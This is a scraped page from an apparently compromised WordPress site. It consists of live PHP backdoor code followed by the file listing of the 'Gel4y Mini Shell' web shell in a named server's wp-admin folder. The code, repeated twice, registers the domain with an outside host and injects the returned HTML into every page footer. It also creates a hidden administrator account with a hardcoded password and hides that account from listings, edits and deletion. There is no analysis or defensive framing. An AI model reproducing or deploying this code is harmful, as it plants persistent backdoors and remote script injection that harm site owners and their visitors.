function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.221)
  • Path: ~/var/www/website/vuongbao/vuong-bao.com/wp-admin/
    Name Size Permission Action
    css N/A drwxrwxr-x
    images N/A drwxrwxr-x
    includes N/A drwxrwxr-x
    js N/A drwxrwxr-x
    maint N/A drwxrwxr-x
    meta N/A drwxrwxr-x
    network N/A drwxrwxr-x
    user N/A drwxrwxr-x
    .DS_Store 6.004KB -rwxrwxr-x
    about.php 15.169KB -rwxrwxr-x
    admin-ajax.php 4.832KB -rwxrwxr-x
    admin-footer.php 2.757KB -rwxrwxr-x
    admin-functions.php 0.396KB -rwxrwxr-x
    admin-header.php 8.703KB -rwxrwxr-x
    admin-post.php 1.632KB -rwxrwxr-x
    admin.php 12.13KB -rwxrwxr-x
    async-upload.php 4.579KB -rwxrwxr-x
    authorize-application.php 9.603KB -rwxrwxr-x
    comment.php 11.236KB -rwxrwxr-x
    credits.php 3.667KB -rwxrwxr-x
    custom-background.php 0.406KB -rwxrwxr-x
    custom-header.php 0.416KB -rwxrwxr-x
    customize.php 10.341KB -rwxrwxr-x
    edit-comments.php 13.74KB -rwxrwxr-x
    edit-form-advanced.php 28.295KB -rwxrwxr-x
    edit-form-blocks.php 10.755KB -rwxrwxr-x
    edit-form-comment.php 7.969KB -rwxrwxr-x
    edit-link-form.php 6.151KB -rwxrwxr-x
    edit-tag-form.php 10.18KB -rwxrwxr-x
    edit-tags.php 21.693KB -rwxrwxr-x
    edit.php 18.793KB -rwxrwxr-x
    erase-personal-data.php 7.106KB -rwxrwxr-x
    export-personal-data.php 7.079KB -rwxrwxr-x
    export.php 10.74KB -rwxrwxr-x
    freedoms.php 4.4KB -rwxrwxr-x
    import.php 7.384KB -rwxrwxr-x
    index.php 7.63KB -rwxrwxr-x
    install-helper.php 5.89KB -rwxrwxr-x
    install.php 16.503KB -rwxrwxr-x
    link-add.php 0.725KB -rwxrwxr-x
    link-manager.php 4.15KB -rwxrwxr-x
    link-parse-opml.php 2.592KB -rwxrwxr-x
    link.php 2.696KB -rwxrwxr-x
    load-scripts.php 1.66KB -rwxrwxr-x
    load-styles.php 2.467KB -rwxrwxr-x
    media-new.php 3.165KB -rwxrwxr-x
    media-upload.php 3.486KB -rwxrwxr-x
    media.php 5.499KB -rwxrwxr-x
    menu-header.php 9.684KB -rwxrwxr-x
    menu.php 15.896KB -rwxrwxr-x
    moderation.php 0.3KB -rwxrwxr-x
    ms-admin.php 0.191KB -rwxrwxr-x
    ms-delete-site.php 4.179KB -rwxrwxr-x
    ms-edit.php 0.211KB -rwxrwxr-x
    ms-options.php 0.218KB -rwxrwxr-x
    ms-sites.php 0.21KB -rwxrwxr-x
    ms-themes.php 0.212KB -rwxrwxr-x
    ms-upgrade-network.php 0.214KB -rwxrwxr-x
    ms-users.php 0.21KB -rwxrwxr-x
    my-sites.php 4.56KB -rwxrwxr-x
    nav-menus.php 45.768KB -rwxrwxr-x
    network.php 5.316KB -rwxrwxr-x
    options-discussion.php 15.143KB -rwxrwxr-x
    options-general.php 14.658KB -rwxrwxr-x
    options-head.php 0.48KB -rwxrwxr-x
    options-media.php 6.181KB -rwxrwxr-x
    options-permalink.php 19.349KB -rwxrwxr-x
    options-privacy.php 9.882KB -rwxrwxr-x
    options-reading.php 9.664KB -rwxrwxr-x
    options-writing.php 8.489KB -rwxrwxr-x
    options.php 12.51KB -rwxrwxr-x
    plugin-editor.php 13.113KB -rwxrwxr-x
    plugin-install.php 6.762KB -rwxrwxr-x
    plugins.php 28.56KB -rwxrwxr-x
    post-new.php 2.64KB -rwxrwxr-x
    post.php 9.871KB -rwxrwxr-x
    press-this.php 2.33KB -rwxrwxr-x
    privacy-policy-guide.php 3.516KB -rwxrwxr-x
    privacy.php 2.417KB -rwxrwxr-x
    profile.php 0.276KB -rwxrwxr-x
    revision.php 5.427KB -rwxrwxr-x
    setup-config.php 16.461KB -rwxrwxr-x
    site-editor.php 4.226KB -rwxrwxr-x
    site-health-info.php 3.929KB -rwxrwxr-x
    site-health.php 9.54KB -rwxrwxr-x
    term.php 2.2KB -rwxrwxr-x
    theme-editor.php 14.852KB -rwxrwxr-x
    theme-install.php 21.689KB -rwxrwxr-x
    themes.php 45.282KB -rwxrwxr-x
    tools.php 3.412KB -rwxrwxr-x
    update-core.php 43.72KB -rwxrwxr-x
    update.php 12.426KB -rwxrwxr-x
    upgrade-functions.php 0.333KB -rwxrwxr-x
    upgrade.php 5.469KB -rwxrwxr-x
    upload.php 13.77KB -rwxrwxr-x
    user-edit.php 34.192KB -rwxrwxr-x
    user-new.php 23.444KB -rwxrwxr-x
    users.php 21.027KB -rwxrwxr-x
    widgets-form-blocks.php 2.389KB -rwxrwxr-x
    widgets-form.php 18.94KB -rwxrwxr-x
    widgets.php 1.091KB -rwxrwxr-x
    Copyright © 2021 - Powered By Indonesian Darknet